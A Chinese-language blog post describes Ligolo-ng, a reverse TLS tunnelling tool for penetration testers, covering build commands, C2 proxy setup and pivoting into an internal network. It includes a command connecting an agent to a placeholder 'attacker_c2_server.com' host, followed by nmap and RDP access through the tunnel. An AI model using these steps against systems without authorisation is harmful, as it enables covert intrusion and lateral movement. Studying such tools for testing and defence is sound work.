使用Ligolo-ng建立隐蔽的通信信道

最新推荐文章于 2024-08-10 08:05:07 发布
最新推荐文章于 2024-08-10 08:05:07 发布
阅读量515 收藏
点赞数
分类专栏: 安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43977912/article/details/121383259
版权

关于Ligolo-ng
Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。

功能介绍
Tun接口(不再需要SOCKS);
简单的UI界面,支持选择代理和网络信息;
易于使用,易于安装;
基于Let’s Encrypt的自动化证书配置;
高性能(多路复用);
不需要高级权限;
套接字监听/代理绑定;
多平台代理支持;

工具构建
构建Ligolo-ng
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
Build agent for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

工具使用
首先,我们需要在目标设备上启动代理(无需特殊权限):
$ ./agent -connect attacker_c2_server.com:11601
此时,代理服务器上将出现一条会话链接:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=“XX.XX.XX.XX:38000”
使用“session”命令选择代理:
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
使用“ifconfig”命令显示代理的网络配置信息:
[Agent : nchatelain@nworkstation] » ifconfig

[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由:
$ sudo ip route add 192.168.0.0/24 dev ligolo
最后,在代理上开启一条通信信道:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
现在,你就可以通过代理服务器访问192.168.0.0/24代理网络:
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
支持的协议/数据包
TCP
UDP
ICMP

性能
在Ligolo-ng的帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是在一台200Mbits/s服务器上使用iperf测试的一条200Mbits/s的链接:
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483

注意事项
由于代理并不是以高级权限运行的,因此无法转发原始数据包。当你执行“NMAP SYN-SCAN”的时候,代理上会执行一次TCP connect()。
在使用Nmap时,你应该使用“–unprivileged”或“-PE”以避免假阳性。

项目地址
Ligolo-ng:https://github.com/tnpitsecurity/ligolo-ng

在这里插入图片描述

黄一113530
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[AI in sec]-039 DNS隐蔽信道的检测-特征构建
学-> 思->用
04-07 114
DCC是指利用DNS数据包中的可定义字段秘密传递信息的通道。其中,“DNS 协议”是目前网络上使用的标准域名解析协议;“可定义字段”是DNS 数据包中的 QNAME 字段、RDATA 字段及RawUDP字段。利用DNS数据包可以构建2种信道:存储信道及时间信道
网络安全】无需SOCKS支持,帮助广大渗透测试人员建立一条隐蔽通信信道
HBohan的博客
09-25 5199
关于Ligolo-ng Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽通信信道,而且无需SOCKS支持。 功能介绍 Tun接口(不再需要SOCKS); 简单的UI界面,支持选择代理和网络信息; 易于使用,易于安装; 基于Let’s Encrypt的自动化证书配置; 高性能(多路复用); 不需要高级权限; 套接字监听/代理绑定; 多平台代理支持; 工具构建 构建Ligolo-ng.
利用DNS隧道构建隐蔽C&C信道
阿道夫的博客
08-09 637
无论是高级持续性威胁(APT)、僵尸网络(Botnet),还是勒索软件、后门等,命令与控制信道(C&C)都是其重要组成部分,尤其是APT和僵尸网络中的C&C信道决定了其威胁程度。学术界和工业界就C&C方面的研究已逐渐深入,目前网络战格局逐渐形成,公众对网络安全逐渐重视,网络空间中的攻防双方持续较量。迫于当前形势,攻击者逐渐转向“低调”,近年曝光的多起大型APT攻击事件都倾向于构建隐蔽的的C&C信道
[内网安全]五.内网通信隐蔽隧道技术
PsgQ的博客
05-15 1382
作为网络安全爱好者,对内网的渗透学习必不可少。因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!督促自己完成每一个实验,把每一个细节搞懂,加油~ 文章目录隐蔽通信隧道基础知识什么是隧道:常用的隧道技术:防火墙安装内网连通性判断1 ICMP协议2 TCP协议3 HTTP协议4 DNS协议5 代理服务器网络层隧道1 IPv6隧
探索网络的利器:Ligolo - 简单易用的反向隧道工具
gitblog_00027的博客
05-13 281
探索网络的利器:Ligolo - 简单易用的反向隧道工具 ligoloReverse Tunneling made easy for pentesters, by pentesters https://sysdream.com/项目地址:https://gitcode.com/gh_mirrors/li/ligolo Ligolo 是一个专为渗透测试者设计的轻量级工具,它简化了在安全环境中建立S...
VERA-NG_雷达_VERA-NG_
09-28
这种工作方式使得VERA-NG雷达具有极高的隐蔽性,不易被敌方探测到,同时减少了对电磁环境的干扰。 VERA-NG的主要特点包括: 1. **多频谱能力**:能够处理多个频段的信号,从低频到高频,甚至包括微波和毫米波,...
电信设备-一种数据库隐蔽信道检测方法.zip
09-19
一种常见的方法是行为基线分析,即建立正常操作模式的基线,然后对比任何偏离基线的行为,这可能是隐蔽信道活动的迹象。此外,统计分析和机器学习技术也被广泛应用于识别异常行为。例如,通过对查询频率、执行时间、...
信14-通信硅芯管隐蔽工程检查记录.docx
12-16
通信硅芯管隐蔽工程检查记录 通信硅芯管隐蔽工程检查记录是通信工程中一个重要的质量控制过程。在本记录中,检查了信14年某月某日单位工程名称单位工程编号分部工程名称工业电视监控系统设备安装工程的施工质量。 ...
GreyFan:一种Wi-Fi隐蔽信道攻击框架
01-19
2018 年,业界首次提出了一种物理隔离环境下的 Wi-Fi 隐蔽信道方法——Ghost Tunnel,即在Wi-Fi尚未连接的状态下,无线AP可成功将数据传给发起连接请求的计算机。提出了一种基于Ghost Tunnel方法的攻击框架—— ...
隐蔽信道分析及测试
10-27
关于隐蔽信道的小总结,隐蔽通道利用现有的隐蔽、穿透技术在网络中传输数据,隐藏机密信息,从而达到隐蔽目的,使窃密的传输过程不被发现,即使被发现也不能查证。路径不能被追踪查看,从而隐蔽攻击源。
ligolo:渗透测试者可以通过反向测试使渗透测试者更加容易https
03-18
Ligolo:渗透测试人员可以轻松进行反向隧穿 目录 介绍 Ligolo是一个简单轻巧的工具,可通过反向连接以完全安全的方式建立SOCKS5或TCP隧道(带椭圆曲线的TLS证书)。 这相当于把Meterpreter就会自动布线与SOCKS4A +,但更稳定,速度更快。 用例 您在外部审核期间破坏了Windows / Linux / Mac服务器。该服务器位于LAN网络内部,您想与该网络上的其他计算机建立连接。 Ligolo可以设置隧道来访问内部服务器的资源。 快速演示 使用代理链(WAN)中继RDP连接。 表现 这是两个100mb / s主机(ligolo / localrelay)之间的速度测试的屏幕截图。性能可能会因系统和网络配置而异。 用法 设置/编译 确保Go已安装并且正在运行。 获取Ligolo和依赖项 cd `go env GOPATH`/src git clone http
论文研究-声波隐蔽通信关键技术及其应用 .pdf
08-21
声波隐蔽通信是一种利用声波信号作为信息载体,通过声信道实现数据传输的技术。这一技术在计算机安全领域有着重要的应用,尤其是在防止敏感信息被非法截获和泄露方面表现出独特的价值。随着信息技术的快速发展,信息...
服务器连接工具_Ligolo:一款反向隧道工具
weixin_39860108的博客
12-04 395
LigoloLigolo是一款专为安全测试人员设计的反向隧道工具。实际上,它是一款实现和使用都非常简单的轻量级工具,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的运行速度更快,并且更加稳定。功能介绍1、TLS 1.3隧道,带有TLS绑定;2、多平台支持,包括...
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具
gitblog_00081的博客
04-09 371
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具 ligolo-ng项目地址:https://gitcode.com/gh_mirrors/lig/ligolo-ng 是一个强大的、开源的网络嗅探和数据包分析工具,旨在帮助网络安全研究人员、开发人员和爱好者监控网络流量,发现潜在的安全问题和优化网络性能。它的设计思路简洁,易于使用,并且提供了一系列先进的功能,使得网络诊断变得更加直观和高效...
【基础知识】隐藏通信隧道技术
苏柳欣的博客
04-19 5860
基础知识什么是通信隧道什么是边缘设备(edge device)各层常用隧道举例 什么是通信隧道 在这里研究的隧道,具体就是一种绕过端口屏蔽的方式。举个🌰 ,比如在一个防火墙两端进行数据通信,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,进而通过防火墙,在防火墙两端进行通信,防火墙两端开辟的路径就相当于是一个隧道。另外,数据包经过防火墙会被封装,出去之后会解封。 什么是边缘设备(edge device) 参考链接:https://zh.wikipedia.org/wiki/边缘https
隐蔽信道学习
Fiverya的博客
01-09 1691
隐私隧道
Ligolo-ng 安装与使用教程
最新发布
gitblog_00009的博客
08-10 351
Ligolo-ng 安装与使用教程 ligolo-ngAn advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.项目地址:https://gitcode.com/gh_mirrors/li/ligolo-ng 1. 项目介绍 Ligolo-ng 是一个轻量级、快速的工具,专为渗透测试者设计,用于通过反向T...
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5323
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
Ipa-medit:针对重签名IPA的内存搜索和修复工具
weixin_43977912的博客
10-09 5168
关于Ipa-medit Ipa-medit是一款针对重签名IPA的内存搜索和修复工具,该工具可以在不越狱的情况下使用,主要针对的是移动端游戏安全测试领域。 内存修改是游戏领域中最容易实现作弊的方法了,它也是安全测试中需要重点检查的项目之一。当然了,社区还有其他的一些作弊工具可以使用,比如说GameGem和iGameGuardian等等。但是,现在还没有支持未越狱设备并且带有CUI的工具,因此我们开发出了Ipa-medit,广大研究人员可以将其当作安全测试工具来使用。 工具要求 macOS:需要先安装好有效的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值